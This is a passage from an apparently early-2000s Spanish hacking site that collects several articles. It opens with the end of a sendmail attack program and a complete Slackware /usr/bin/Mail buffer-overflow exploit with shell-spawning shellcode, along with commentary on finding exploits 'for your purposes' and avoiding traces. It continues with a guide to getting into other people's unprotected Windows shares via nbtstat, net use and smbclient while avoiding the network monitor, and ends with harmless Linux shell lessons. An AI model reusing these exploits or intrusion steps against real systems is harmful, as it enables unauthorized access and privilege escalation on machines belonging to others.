fprintf(d,”helo tweety\n”);
fprintf(d,”mail from: tweety@polbox.com\n“);
fprintf(d,”rcpt to: %s@%s\n”,argv[1],argv[2]);
fprintf(d,”data\n”);

usleep(100000);

for(loop=3D0;loop if (!(loop%100)) fprintf(stderr,”.”);
fprintf(d,”To: x\n”);
}

fprintf(d,”\n\n\nsomedata\n\n\n”);

fprintf(d,”.\n”);

sleep(1);

fprintf(d,”quit\n”);
fflush(d);

sleep(100);
shutdown(suck,2);
close(suck);
exit(0);
}

waitpid(x,&loop,0);

fprintf(stderr,”ok\n”);

return 0;
}

——————/end sendmail exploit—————————
**Para terminar uno de Slackware

——————/begin mail-slack exploit———————-
/*
* mail-slak.c (C) 2000 Paulo Ribeiro <prrar@nitnet.com.br>
*
* Exploit for /usr/bin/Mail.
* Made specially for Slackware Linux 7.0.
* Based on mailx.c by funkySh.
*
* OBS.: Without fprintf(stderr) is not possible to print the message.
*
* USAGE:
* slack$ ./mail-slak
* type ‘.’ and enter: .
* Cc: too long to edit
* sh-2.03$ id
* uid=3D1000(user) gid=3D12(mail) groups=3D100(users)
*/

#include
#include
#include

char buffer[10000];
char shellcode[] =3D
“\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x0c\x31″

“\xc0\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3\x0c\xb1″

“\x0c\x31\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76″

“\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89″

“\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89″
“\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh”;

unsigned long getesp(void)
{
__asm__(“movl %esp,%eax”);
}

int main(int argc, char **argv)
{
int x;
long addr =3D getesp() – 18000;

memset(buffer, 0×90, 10000);
memcpy(buffer + 800, shellcode, strlen(shellcode));

for(x =3D 876; x < 9998; x +=3D 4)
*(int *)&buffer[x] =3D addr;

fprintf(stderr, “type ‘.’ and enter: “);

execl(“/usr/bin/Mail”, “/usr/bin/Mail”, “nobody”, “-s”,
“blah”, “-c”, buffer, 0);
}

/* mail-slack.c: EOF */

—————–/end mail-slack exploit————————–
Esto solo ha sido una muestra. Si en rootshell.com utilizais la
untilidad search podreis buscar los exploits relativos a aquellos
programas o servicios que os interesen para vuestros fines }:)).

Bueno…ya esta bien por esta entrega. La proxima nos dedicaremos a
conseguir privilegios de root desde un acceso local y a preparar
nuestras herramientas.

Antes de terminar…ni se os ocurra intentar entrar en ninguna maquina
remota en plan novato apenas sabiendo cuatro cosas, porque dejariais
unas huellas y vestigios que os delatarian ipso facto. Ya a medida que
avancemos os dire algunas cosillas fundamentales para ser casi
invisible…pero no todavia. Por ultimo, aunque no quiero meteros
mucha tela, existen una serie de escaners que auditan redes y que
delatan diversos fallos de seguridad y vulnerabilidades. Anta=F1o
estaba sscan, pero ahora es mucho mejor usar saint o nessus…pero ya
os dire como.

Tened cuidado ahi dentro ;-P

�
————–2EC61C705517942E3D414456–

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.

Recursos compartidos

CrinO — Fri, 15 Jun 2001 22:13:48 +0000

#####################################
## HACKINDEX ##
## http://www.hackindex.org ##
#####################################
Titulo: Recursos compartidos
Autor: CrinO
Tema: Acceso a las cosas remotas

La información incluída en este documento es expuesta en base a un interés educativo. HackIndex no se hace responsable del uso de dicha información.

Hola a todos, en este corto articulo voy a tratar de una forma casi practica los recursos compartidos de Microsoft (este articulo esta basado en una respuesta que di en las news), con una breve introduccion teorica, si despierta interes (y alguien se anima ;-P) mas adelante se puede dedicar otro capitulo a “destripar” el funcionamiento de los protocolos NetBios y NetBeui (estoy en ello ).

Caso Primero: SIN CONTRASEÑA

DESDE WINDOWS:

¿Que se puede hacer?, bueno, lo contare como si operasemos desde otro guindos.

Antes de hacer nada, deberemos de activar nuestro cliente de NetBIOS, lo cual lo haremos dirigiendonos al Menu de inicio–>Configuracion–>Panel de control–>Red Una vez que estamos en la ventana de red, daremos a “agregar” y seleccionamos “cliente” y de la ventana de los clientes disponibles seleccionamos “Cliente para redes Micrisoft”. Daremos ha aceptar cuantas veces requiera (lo mismo nos pide el CD de Windows) y lo terminamos de instalar. Con esto ya tendremos todas las herramientas que necesitamos. Notese que no hemos instalado el servicio, ya que seriamos vulnerables a ataques del tipo aqui descrito y a los diversos nukes.

Lo primero que hacemos es abrir una ventana de MS-DOS, y ejecutamos el comando nbtstat, que por su nombre os podeis imaginar para que sirve.

c:\> nbtstat -A IP (donde IP es la ip del ordenador objetivo)

NetBios Remote Machine Name Table

Name type status
———————————–

PARDILLO <00> UNIQUE Registered
PARDILLOGROUP <00> GROUP Registered
PARDILLO <03> UNIQUE Registered
PARDILLO <20> UNIQUE Registered
PARDILLOGROUP <1E> GROUP Registered
PEPITO <00> UNIQUE Registered
PEPITO <1D> UNIQUE Registered
..__MSBROWSE__.. <01> GROUP Registered
PEPITO <03> UNIQUE Registered

MAC Address = loquesea

Bueno, ahora y antes de nada pasare a explicar por encima que significa cada campo de esta tabla:

<00> UNIQUE: Quieren decir que la maquina tiene activado el cliente para NetBIOS, y que su nombre NetBIOS es el que pone en el campo Name, en este caso es PARDILLO.

<00> GROUP: Indica el Dominio o Grupo de trabajo.

<03> UNIQUE: Este tipo significa que el servicio de mensajeria esta activo (Messeger Service), os suenan los mensajes emerjentes (Win Popup)?, pues es eso. En las maquinas Win9x esta activo por defecto, por eso aparece el nombre Netbios de la maquina hay tambie, pero si nos fijamos mas abajo, tambien aparece con el nombre del usuario conectado en ese momento.

<20> UNIQUE: Este tipo nos indica que tiene el File Server Service activo, o sea esta compartiendo archivos e impresoras, bueno, que tiene el servicio activo, aunque se puede dar el caso de que no comparta nada.

<1E> GROUP: Quiere decir que tiene activado el servicio Browser Service Elections, este servicio se encarga de negociar quien va ha ser el Master Browser del Dominio o Grupo.

<1D> UNIQUE: Indica que esta configurado para ser el Master Browser, que es como quien dice, el encargado de recoger los nombres NetBIOS de los equipos de su Grupo.

<01> GROUP: Indica que posee el estatus de Master Browser en su Grupo de Trabajo y esta marcado con __MSBROWSE__. Esta particularidad es muy util para conseguir informacion del resto de la red, ya que el mantiene, como Master Browser que es, una tabla con todos los nombres NetBIOS de su Grupo de Trabajo y las direcciones IP que les corresponde.

<1C> GROUP: Indica que la maquina es controlador de dominio, bien un PDC o BDC, logicamente, solo veremos este campo en Win NT server o en Samba Server.

<1B> GROUP: Nos indica el nombre del Domain-Controler del que depende.

Hay mas tipos de campos, eso tengo entendido, pero a dia de hoy yo conozco estos.

Pues bien, como hemos visto tras el analisis de la tabla, los campos <00> UNIQUE y <20> UNIQUE nos muestran el nombre NetBIOS de la maquina, en este caso PARDILLO, y en las etiquetas <03> UNIQUE,que aparecen mas abajo, vemos el usuario que esta en el ordenador y donde pone <00> GROUP es el del grupo de trabajo/dominio en el que se ubica la maquina.

¿Que sacamos de aqui?, pues que tenemos el nombre netbios de la maquina, el grupo de trabajo en el que esta, quien lo usa y que comparte recursos.

Editamos el archivo LMHOSTS, que esta en c:\windows y le añadimos a ip y el nombre de la maquina que hemos obtenido. Si no sabeis el formato del archivo LMHOSTS, editad el LMHOSTS.sam que es un ejemplo (tambien esta en el directorio windows).

Ahora ejecutamos ntbstat -R, para que cargue el nuevo LMHOST.

Seguimos, vamos a ver que es lo que comparte la maquina PARDILLO:

c:\> net view \\PARDILLO

y nos saldra todo los recursos compartidos que tenga activos.

Hemos de notar aqui, como se comento antes, que aunque vieramos el Servidor de ficheros activo, podria darse el caso de que no tenga nada compartido.

Y ahora que ya sabemos los nombres de los recursos compartidos ya podemos utilizarlos , simplemente:

c:\> dir \\PARDILLO\cartas

y nos dira todo lo que hay en el recurso “cartas”, por ejemplo copy, o del, o type, lo que os de la gana, ya que en este caso, si no tiene contraseña, no nos pedira autentificacion.

Hasta aqui bien, hemos supuesto que el objetivo tambien es una maquina Win9X pero si es una maquina Win NT?, pues segun maneja NT el protocolo NetBIOS no nos dejaria entrar, ya que no corresponde el usuario que nuestro ordenador le facilita con ninguno de su base de datos de seguridad. Para ello utilizaremos el usuario que nos facilito el comando netstat y esta vez no nos quedara mas remedio que montar la unidad de red de la siguiente manera:

c:\> net use d: \\PARDILLO\cartas /USER:dominio\usuario

Donde en este caso he utilizado la unidad “d”, pero podeis utilizar cualquier letra que tengais libre.

El parametro que hemos dado “/USER:dominio\usuario” sirve para especificar con que usuario nos conectamos, normalmente el campo “dominio” os lo saltareis, pero habra veces que sin el no deje conectarse. Es buena idea utilizar lo que aparecia en el netstat como grupo en este campo. En “usuario” pondremos el usuario anteriormente citado.

¿y porque no “conectarse a unidad de red”? pensara alguno, pues porque si lo hacemos asi apareceremos en el monitor de red, y supongo que no es agradable ¿verdad? X’DDD, en el caso del NT, deberemos correr el riesgo (¿o quiza no?).

DESDE LINUX:

Bueno, realizar la conexion desde Linux, viene a ser el mismo procedimiento pero usando distintos comandos. Antes de nada, debereis tener instalado el paquete “Samba”, el cual nos permite la conectividad con el protocolo NetBIOS sobre IP, ademas de que como servidor es excelente, segun lo veo yo. Tambien necesitareis el “nbtscan”, es un programa muy util, que hace la funcion del netstat de MS-DOS, pero contando con mas mejoras.

Empezaremos por averiguar el nombre NetBIOS del la IP que es nuestro objetivo y su grupo de trabajo, y de paso sacaremos mas datos de interes.

Para ello haremos lo siguiente desde una consola:

[crino@CrinO]$ nbtscan -vh IP
Doing NBT name scan for adresses from IP

NetBIOS Name Table for Host IP:

Name Service Type
—————————————-
PARDILLO Workstation Service
PARDILLOGROUP Domain Name
PARDILLO Messenger Service
PARDILLO File Server Service
PARDILLOGROUP Browser Service Elections
PARDILLO Messenger Service

Adapter address: la mac que sea
—————————————-

Como vemos, en este caso, el nbscan, con la opcion -h (human readable) nos ayuda a interpretar cada cosa.

El campo “Workstation Service”, es el campo que con el netstat de MS-DOS veiamos como <00> UNIQUE, para ver la tabla en ese formato solo tenemos que llamar a nbtscan sin la opcion -h, y este campo es el nombre NetBIOS que buscabamos como se comento antes. Tambien hemos de notar, que el tipo <03> UNIQUE que hay al final y que nbtscan nos muestra como “Messeger Service”, es el nombre del usuario conectado a la maquina, para ver esto mas claramente sera suficiente con que hagamos:

[crino@CrinO]$ nbtscan IP
Doing NBT name scan for adresses from IP

IP address NetBIOS Name Server User MAC address
——————————————————————————
IP PARDILLO PARDILLO La MAC que sea

Como vemos, en este caso coinciden el nombre de la maquina y el usuario conectado, esto pasa cuando no se han definido usuarios en un Win/9x, pero que si los hubiera, probablemente no coincidirian.

Como podemos observar, el nbtscan nos indica que tiene el servidor de ficheros activado, pues observamos “File Server Service” (<20> UNIQUE), entonces seguramente estara compartiendo algo, ahora pasemos a ver que comparte, para ello usaremos el cliente en modo texto del paquete Samba, que se asimila mucho a un cliente FTP:

[crino@CrinO]$ smbclient -L //PARDILLO -I IP
SSL: Error error setting CA cert locations: error:00000000::lib(0) :func(0) :reason(0)
trying default locations.
added interface ip=10.10.10.10 bcast=10.10.10.127 nmask=255.255.255.240
added interface ip=192.168.100.1 bcast=192.168.100.255 nmask=255.255.255.0
Got a positive name query response from 10.10.10.11 ( 10.10.10.11 )
Password:

Sharename Type Comment
——— —- ——-
C Disk
IPC$ IPC Comunicaci”n remota entre procesos

Server Comment
——— ——-

Workgroup Master
——— ——-
PARDILLOGROUP PARDILLO

Ya tenemos todos los datos necesarios, sabemos como se llama, su IP, su Grupo/Dominio y que comparte, ya podemos intentar conectarnos, para lo cual usaremos de nuevo el smbclient:

[root@CrinO /root]# smbclient //PARDILLO/c
SSL: Error error setting CA cert locations: error:00000000::lib(0) :func(0)
:reason(0)
trying default locations.
added interface ip=10.10.10.10 bcast=10.10.10.127 nmask=255.255.255.240
added interface ip=192.168.100.1 bcast=192.168.100.255 nmask=255.255.255.0
Password:
smb: \>

Y ya estamos dentro, cuando el smbclient nos pida la password, simplemente daremos al intro, tambien si le expecificamos el parametro -N no nos pedira la pass. El manejo del cliente es similar a un cliente de ftp, para mas informacion “man smbclient”.

Una vez aqui, volvemos a lo de antes, el caso de que sea un NT y no un win9x, lo cual requerira que le especifiquemos el usuario y Dominio (o Grupo de Trabajo):

[root@CrinO /root]# smbclient //PARDILLO/c -U PARDILLO -W PARDILLOGROUP
SSL: Error error setting CA cert locations: error:00000000::lib(0) :func(0)
:reason(0)
trying default locations.
added interface ip=10.10.10.10 bcast=10.10.10.127 nmask=255.255.255.240
added interface ip=192.168.100.1 bcast=192.168.100.255 nmask=255.255.255.0
Password:
smb: \>

Como se observa facilmente, las opciones para especificar usuario y grupo son -U y -W respecticamente.

Caso Segundo:SIN CONTRASEÑA

En el caso de que los recursos se encuentren con contraseña, deberemos utilizar otras tecnicas para llegar al caso uno.

Para conseguir la contraseña podemos recurrir a gran cantidad de programas que corren por la red, los cuales lo unico que hacen como norma general es un ataque por fuerza bruta. Ejemplo de este tipo de programa es el CAIN.

Otra tecnica mas “sutil” y avanza, de la cual no es proposito este texto, es aplicar sniffing y spoofing, tecnicas que solo pueden ser utilizadas en escenarios muy concretos o es posible usar algun bug del proceso de autentificacion en el caso de win95/98, los cuales han sido ya documentados.

En el caso de Win NT/2000, podremos continuar intentando los clasicos ataques por fuerza bruta al recurso, o a la hora de sniffar usar un crackeador de MD5 por fuerza bruta, ya que este es el metodo de encriptacion que usa esta plataforma. Tambien hay que tener en cuenta que cuando tratamos con Dominios de NT, deberemos ser autentificados previamente por un PDC o BDC…aunque tambien hay documentos mas avanzados en la red que explican vulnerabilidades de estos procesos…pero eso es otra historia

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.

La Pantalla Negra IV

Lokutus — Fri, 15 Jun 2001 22:12:33 +0000

#####################################
## HACKINDEX ##
## http://www.hackindex.org ##
#####################################
Titulo: La pantalla negra IV
Autor: Lokutus
Tema: Linux

La información incluída en este documento es expuesta en base a un interés educativo. HackIndex no se hace responsable del uso de dicha información.

Y una vez más entramos en nuestro sistema. Vamos a ver que tipos de ficheros tenemos.

Linux Debian (Potatoe)Login: genaro
password:
[genaro]$_

Vimos en un capítulo anterior, que con la órden “cat”, podemos ver el contenido de un fichero.

[genaro]$ cat fichero.txt
Esto es el contenido de mi fichero
[genaro]$ _

Pero vamos a cotillear otros ficheros, (si estas accediendo con un telnet no hagas la siguiente órden), por ejemplo, vamos a ver que tiene el fichero “less” por dentro.

[genaro]$ cat /usr/bin/less
dsfgvrtyv456v3ty 45 tg fgf f wf werv345v
v 4345v2345v45v3 (pitido)sdf df sdfsd(pitido)
df f wef wefwe(requetepitido) sdf sdf df sdfsdf
[cosas muy raras]$ _

Hemos visto aparecer en la pantalla una sucesión de símbolos raros, pitidos, e incluso, se nos ha desconfigurado la consola.

Si tecleamos algo, las letras han sido cambiadas por símbolos semigráficos.

Para dejar la consola como estaba, se usa la órden “reset”, también se restaura solo cada vez que se rearranca el ordenador, aunque de todas formas, cada vez es más raro que se desconfigure el terminal.

Vamos a entrar en otra sesión. Linux, puede disponer en su consola de varias sesiones virtuales, por defecto hasta siete, pulsando la combinación de teclas “Alt + F2″, vamos a la sesión 2, para volver pues “Alt + F1″, podemos combinar “Alt ” con las teclas F1 hasta F6. F7 normalmente está reservada para XWindow, y para conmutar de X Window a modo texto, es necesario pulsar además la tecla “Control”.

Linux Debian (Potatoe)Login: genaro
password:
[genaro]$ _

Cuando hemos volcado el fichero “less”, nos ha salido los símbolos raros, por que “less” no es un fichero para ser leido, no es un fichero de texto plano, y puede contener, y contiene carácteres que no son imprimibles en la salida estandar.

Para saber que tipo de fichero es un fichero determinado, tenemos la órden “file”.

[genaro]$ file /usr/doc/FAQ/txt/Linux-FAQ
/usr/doc/FAQ/txt/Linux-FAQ: English Text
[genaro]$ file /usr/doc/FAQ/html/Linux-FAQ-1.html
/usr/doc/FAQ/html/Linux-FAQ-1.html:HTML document text
[genaro]$ file /usr/bin/less
/usr/bin/less: ELF 32-bit LSB executable, Intel 80386, version 1,dynamically linked (uses shared libs), stripped
[genaro] _

Del primer documento nos dice que es de texto, o sea, se puede volcar con “cat”, del segundo, que es html, también se puede volcar, aunque veremos el fuente en HTML, y no como lo veríamos con un navegador como el Linx. Y del tercero, nos dice que es un programa. Con este programa, podemos ver los otros dos ficheros.

El comando file, reconoce entre muchos tipos de ficheros, gif, jpeg, midi, y incluso ejecutables de otros sistemas operativos, y no se deja engañar por la extensión del fichero.

Los ficheros, además de crearlos con un editor de textos, se pueden copiar, mover, y borrar.

[genaro]$ cp /usr/bin/less .
[genaro]$ ls -l less
-rwxr-xr-x 1 genaro users 81236 Mar 21 22:54 less
[genaro]$ _

Con la órden anterior, “cp”, hemos copiado el fichero less a nuestro directorio de trabajo, y como esta copia es nuestra, el propietario del fichero es “genaro”, y el grupo propietario es “users”. Con el puntito, hemos indicado el directorio al que queremos copiar el fichero, puesto que “cp” no permite omitir el segundo parámetro y que se tome el directorio actual como destino.

Vamos a observar por un momento el programa “less” original.

[genaro]$ ls -l /usr/bin/less
-rwxr-xr-x 1 root root 81236 Aug 28 1999 /usr/bin/less

El tamaño es el mismo, pero pertenece al usuario “root”, o sea, el superusuario, y su grupo propietario es “root”, la fecha de creación también a cambiado.

Si observamos los permisos del fichero,

-rwxr-xr-x

El propietario del fichero, o sea, root, es el único que puede escribir en less (rwx), el grupo propietario sólo puede leer y ejecutar como programa (r-x), y nosotros, los demás usuarios, igual, (r-x).

El primer carácter, indica tipo de fichero:

“-” Fichero ordinario, como programas, mpeg, mp3, txt, …
“d” Directorio, se accede a el con “cd”, “ls”, etc.
“c” Fichero de control de dispositivo en modo caracter.
“b” Fichero de control de dispositivo en modo bloque.
“s” Socket de tipo Unix.
“l” Enlace simbólico.

Si observamos nuestro fichero, tiene los mismos permisos, “-rwxr-xr-x”, pero como nosotros somos el propietario del fichero, podemos escribir en el, e incluso podemos borrarlo si queremos.

TIP: el usuario “root”, también puede acceder y escribir en nuestros ficheros aunque quitemos los permisos.

[genaro]$ mkdir OtroDir
[genaro]$ cd OtroDir
[OtroDir]$ _

Creamos una carpeta nueva, y entramos en ella. Vamos a mover el fichero “less”

[OtroDir]$ mv ../less .
[OtroDir]$ ls -l
-rwxr-xr-x 1 genaro users 81236 Mar 21 22:54 less
[OtroDir]$ _

Si queremos borrarlo, usamos la órden rm

[OtroDir]$ rm less
[OtroDir]$ _

Nuestra copia de “less” ya no existe. Un poco de teoría:

¿Sabéis lo que es un inode?.

Supongamos que tenemos una partición vacía de cualquier sistema operativo tipo Unix, SCO, BSD, ext2fs …

En esa partición vacía, hay una o más zonas, en la que no podremos guardar nuestros datos, pues son para uso administrativo del sistema operativo, esa zona, se divide en partes o “cachitos”, llamados inodes, normalmente no suelen tener más de 100 octetos, aunque pueden ser de mayor tama$ntilde;o, dependiendo del sistema de ficheros.

Cuando creamos un fichero vacio, el sistema operativo, rellena de datos un inode, ¿y qué datos son esos?, el nombre del fichero, en qué sectores del disco duro están, su tamaño o longitud, la fecha de última modificación, etc.

Cuando escribimos datos en el fichero, el inode se actualiza, para reflejar los cambios.

Y ahora pregunto, ¿Qué impide que un fichero tenga dos inodes?, nada. El hecho de que un fichero tenga dos inodes, implica, el que está al mismo tiempo en dos sitios con dos nombres diferentes, o en un mismo directorio con dos nombres distintos.

Eso se llama hacer un enlace.

[genaro]$ ln /usr/bin/less ./paginador
[genaro]$ ls -l paginador
-rwxr-xr-x 2 root root 81236 Aug 28 1999 paginador
[genaro]$ ls -l /usr/bin/less
-rwxr-xr-x 2 root root 81236 Aug 28 1999 /usr/bin/less
[genaro]$ _

Fijaros en dos detalles, despues de los permisos, “-rwxr-xr-x” hay un número 2, donde antes había un “1″. Eso quiere decir, que ese número, es el número de inodes que tiene ese fichero. antes tenía un inode, y ahora uno.

¿Cual es el segundo detalle?, que el fichero “paginador” sigue perteneciendo a “root”, si no fuese así, sería un fallo de seguridad, pues para acceder a cualquier fichero, bastaría con hacer un enlace y podremos modificarlo a nuestro antojo.

Cuando usamos la orden rm para borrar un fichero, lo que hace es eliminar un inode, pero los demas inodes siguen existiendo, el fichero, bloque de datos del fichero, sólo se borra cuando no quedan más inodes.

Tick: repito, cuidado con “>”. Ver capítulo III

Es posible que al intentar hacer el enlace, aparezca un mensaje como el siguiente:

ln: no se puede crear un enlace duro de `./less’ a `/usr/bin/less’: Enlace cruzado entre dispositivos no permitido.

Eso es debido a que se está intentando hacer un enlace a un sistema de ficheros diferente. Por ejemplo:

[genaro]$ df
Filesystem 1k-blocks Used Available Use% Mounted on
/dev/hda7 606405 188388 386692 33% /
/dev/hda1 23300 2655 19442 12% /boot
/dev/hda9 1756260 820291 845204 49% /home
/dev/hda8 1554262 655666 818273 44% /usr
/dev/hda6 85520 16686 64418 21% /var
[genaro]$ _

Con la orden “df” vemos que particiones tenemos en el disco duro, nosotros estamos en el directorio “/home/genaro”, que está en la partición /dev/hda9 y la órden “less” está en el directorio “/usr/bin” que está en la partición /dev/hda8

A este tipo de enlace se le llama enlace duro. También se pueden hacer enlaces duros, aunque muchos unices no lo permiten, y en muchos sistemas operativos, sólo está permitido a “root” y está fuertemente desaconsejado, eso es debido a que muchas aplicaciones como las utilidades de backup, y todas aquellas que exploren el disco duro para hacer o buscar algo, podrían entrar en un bucle infinito, y terminarían fallando.

Otro tipo de enlaces, son los enlaces simbólicos, estos enlaces son de alguna forma similares a los accesos directos de Windows, o mejor dicho, los accesos directos de Windows son como los enlaces simbólicos de Unix.

Si haceis analizado alguna vez un acceso directo de Windows, en realidad es un fichero PIF, o sea, un fichero que contiene el nombre de otro fichero.

Los enlaces simbólicos son un fichero con el nombre de otro fichero, y tratado de forma especial por el sistema operativo para que lo trate como si fuera el fichero al que apunta.

Para crear un enlace simbólico

[genaro]$ ln -s /usr/bin/less ./pag-simbolico
[genaro]$ ls -l pag-simbolico
lrwxrwxrwx 1 genaro users 13 Mar 22 00:24 pag-simbolico->/usr/bin/less
[genaro]$ _

Observe como el fichero tiene ahora la letra “l” como primer caracter, la “l” indica enlace simbólico.

Por último nos queda por ver los dispositivos controladores. Están todos en el directorio /dev

Existen dos tipos, de caracter y de bloque. Los dispositivos de bloque, tienen soporte de buffer y se accede mediante grandes bloques de datos al mismo tiempo, un ejemplo, son las particiones del disco duro, y el propio disco duro.

/dev/hda Primer disco duro IDE
/dev/hda1 Primera partición del primer disco duro
/dev/sdb Segundo disco SCSI

Si volcaramos con la órden cat un fichero a uno de estos ficheros, escribiríamos directamente a estos ficheros, y por lo tanto, machacaríamos algo, como la tabla de particiones, o el superbloque de una partición linux, o el arranque de un Windows. Por ese motivo, sólo “root” o programas con permisos de root, puede acceder a estos ficheros.

Los ficheros de caracter, como su nombre indica, se accede a ellos caracter a caracter.

/dev/modem por ejemplo, suele ser un enlace simbólico a un dispositivo de caracter

[genaro]$ ls -l /dev/modem
lrwxrwxrwx 1 root root 10 Dec 22 01:05 /dev/modem ->/dev/ttyS1
[genaro]$ ls -l /dev/ttyS1
crw——- 1 root tty 4, 65 Mar 21 22:11 /dev/ttyS1
[genaro]$_

Los programas que acceden al modem, lo hacen como si fuera un fichero convencional, (para los que conozcan el lenguaje “C” fopen(), fread(), fwrite(), fclose(), fprintf(), etc.).

[genaro]$ tty
/dev/tty2
[genaro]$_

La órden anterior, “tty”, nos dice cual es el controlador de dispositivo de nuestra sesión. /dev/tty

Si el usuario “root” estuviera conectado mediante un telnet, podría hacer una gamberrada tal y como

[root] # echo “Tonto el que lo lea” > /dev/tty2

Y en mi pantalla aparecería ese mensaje.

Tick: En las academias, donde todo el mundo consigue por ingeniería social el password de root, es muy posible que cuando la gente se aburre, no se pueda trabajar debido a que todo el mundo envíe mensajitos usando este método.

También es común gamberradas más gordas volcando ficheros de todo tipo.

Como ejercicio de la semana, os propongo a los que tengais tarjeta de sonido y micrófono, que grabeis un fichero de sonido desde el micrófono.

cat /dev/audio > grabación.raw

Y posteriormente lo envieis a los altavoces

cat /grabacion.raw > /dev/audio

No me acuerdo como se cortaba la grabación, ¿control + “c”?

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.

La Pantalla Negra III

Lokutus — Fri, 15 Jun 2001 22:11:48 +0000

#####################################
## HACKINDEX ##
## http://www.hackindex.org ##
#####################################
Titulo: La pantalla negra III
Autor: Lokutus
Tema: Linux

La información incluída en este documento es expuesta en base a un interés educativo. HackIndex no se hace responsable del uso de dicha información.

Y esta semana, con un poco de retraso, Mario bross, no, no vamos a jugar,vamos a tratar los pipes, o tuberías, y los filtros.

Linux Debian (Potatoe)
Login: genaro
password:
[genaro]$ _

Para empezar, necesitamos crear algunos ficheros con datos, para ello podemos utizar un editor de textos, hay varios, el "joe", el "vi", el "jed", y el "emacs" son cuatro de los más populares, el único del que hay garantia de que se puede encontrar en cualquier Unix es el vi, pero es un poco complejo de utilizar, así que vamos a crear un fichero a pelo.

[genaro]$ echo hola
hola
[genaro]$ _

La órden echo, envía a "salida estandar" un mensaje, ¿Y qué eso de salida estandar? Veamos, cualquier aplicación de Unix/Linux, e incluso las aplicaciones de DOS, tienen tres ficheros abiertos, que utilizan para poder funcionar.

El primer fichero es de sólo lectura y se llama "entrada estandar", representa normalmente al teclado, los programas leen a traves de este fichero todo lo que escribimos. Normalmente se conoce a este fichero como stdin.

El segundo fichero es de sólo escritura, y se llama "salida estandar", y representa la salida de nuestro programa, cuando un programa quiere escribir algo en la pantalla, lo que hace es escribir en este fichero.

El tercer fichero, se llama "error estandar", es también de sólo escritura, es similar al anterior, y se usa para imprimir mensajes de error.

He dicho, que la salida estandar representa la pantalla y la entrada estandar, representa el teclado, pero eso no tiene por que ser siempre así. Podemos cambiar la salida estandar de un programa con el operador ">"

[genaro]$ echo hola > fichero.txt
[genaro]$ _

No hemos visto la salida de echo por la pantalla, la salida ha sido redirigida al fichero "fichero.txt".

[genaro] ls
fichero.txt
[genaro] _

Si queremos ver el contenido de ese fichero usamos la orden "cat"

[genaro] cat fichero.txt
hola
[genaro] _

¿Y como podemos añadir más líneas al fichero?, vamos a intentarlo.

[genaro]$ echo linea2 > fichero.txt ; cat fichero.txt
linea2
[genaro]$ _

Recordemos que se pueden meter dos órdenes en una sóla línea si las separamos con un punto y coma.

¿Qué ha pasado?, se ha machacado el archivo y contiene lo último que hemos escrito. Para que no se sobreescriba utilizamos el símbolo ">>".

[genaro]$ echo linea1 > fichero.txt
[genaro]$ echo linea2 >> fichero.txt
[genaro]$ echo linea3 >> fichero.txt
[genaro]$ cat fichero.txt
linea1
linea2
linea3
[genaro]$ _

Cualquier cosa que envíe cosas a pantalla usando la salida estandar puede ser redirigido, por ejemplo la órden "ls", o incluso la orden "cat".

[genaro]$ cat fichero1.txt >> fichero2.txt
[genaro]$ ls
fichero1.txt fichero2.txt
[genaro]$ _

En este caso como fichero2.txt no existía, lo crea nuevo, y en este caso hemos copiado el fichero, ambos tienen el mismo contenido.

TIP 1: Cuidado con el operador ">", puede machacar documentos, pues siempre los crea nuevos.

¿Qué utilidades podemos encontrar redirigiendo la salida estandar?, veamos:

[genaro]$ ls -l /usr/bin

Salen un montón de ficheros y no dá tiempo a verlos.

[genaro]$ ls -l /usr/bin > fichero3.txt
[genaro]$ _

TIP 2: En lugar de teclear de nuevo "ls -l /usr/bin" podemos recuperar las órdenes anteriores con las flechas de cursor y editarlas a nuestra conveniencia. En este caso con pulsar la flecha arriba una vez, aparece "ls -l /usr/bin" y sólo tenemos que añadir " > fichero3.txt

Si usamos la órden cat, para visualizar fichero3.txt, estamos en las mismas, no nos da tiempo a ver nada, usaremos mejor la órden "more"

[genaro]$ more fichero3.txt

muchas lineas

–more–(12%)

Vemos como en esta ocasión. cuando se acaba la pantalla, la salida se para, si pulsamos el retorno de carro, avanzamos una línea, si pulsamos la barra espaciadora, avanzamos una página entera. Salimos del paginador "more" cuando se acaba el documento a visualizar, o bién cuando pulsamos la tecla "q". En linux hay otro paginador mejor que "more", se llama "less", permite avanzar y retroceder por el texto usando las tecla del cursor.

Vamos a probarlo un poco.

[genaro]$ cd /usr/doc/FAQ
[FAQ]$ _

¿Os acordais de los famosos FAQ y los HowTo de Linux de los que muchos hablan, pues están aqui, en este directorio, …

[FAQ]$ ls -l
drwxr-xr-x 5 root root 1024 Dec 22 01:46 ./
drwxr-xr-x 198 root root 5120 Dec 22 01:46 ../
drwxr-xr-x 2 root root 2084 Dec 22 01:46 html/
drwxr-xr-x 2 root root 1024 Dec 22 01:46 ps/
drwxr-xr-x 2 root root 1024 Dec 22 01:46 txt/
[FAQ]$ _

Vemos que hay un directorio para html, (hará falta un navegador web, como el lynx), otro para documentos que están en postscript y otro para ficheros ASCII planos. Un fichero ASCII plano, es un fichero de texto, que no tiene formato, como los que hemos creado hace poco.

[FAQ]$ cd txt
[txt] less Linux-FAQ

Para volver a nuestro directorio, usamos

[txt] cd $HOME
[genaro] _

HOME es una variable de entorno que contiene nuestro directorio de trabajo, se verán en otro capitulo.

Hasta ahora, hemos visto que podemos guardar la salida estandar de un programa en un fichero, y luego, ver cómodamente esa salida estandar con un paginador, como puede ser "less". Pero eso es un poco incómodo, pues podemos llenar el disco duro de ficheros innecesarios, ¿como podemos evitarnos ese paso? Con ayuda de una "tubería", ya era hora que comenzara a hablar de lo que trata este capítulo. Para utilizar una tubería, se utiliza el operador pipe y es este "|", la barra vertical que se consigue pulsando tecla "1" con la tecla "AltGr"

[genaro]$ ls -l /etc/bin | less

Ya podemos ver tranquilamente en la pantalla qué ficheros tenemos en el directorio /etc/bin Para hacerlo más divertido, con la órden tree, podemos obtener un listado de los directorios existentes a partir de un directorio en forma de árbol.

[genaro]$ tree -d /usr | less

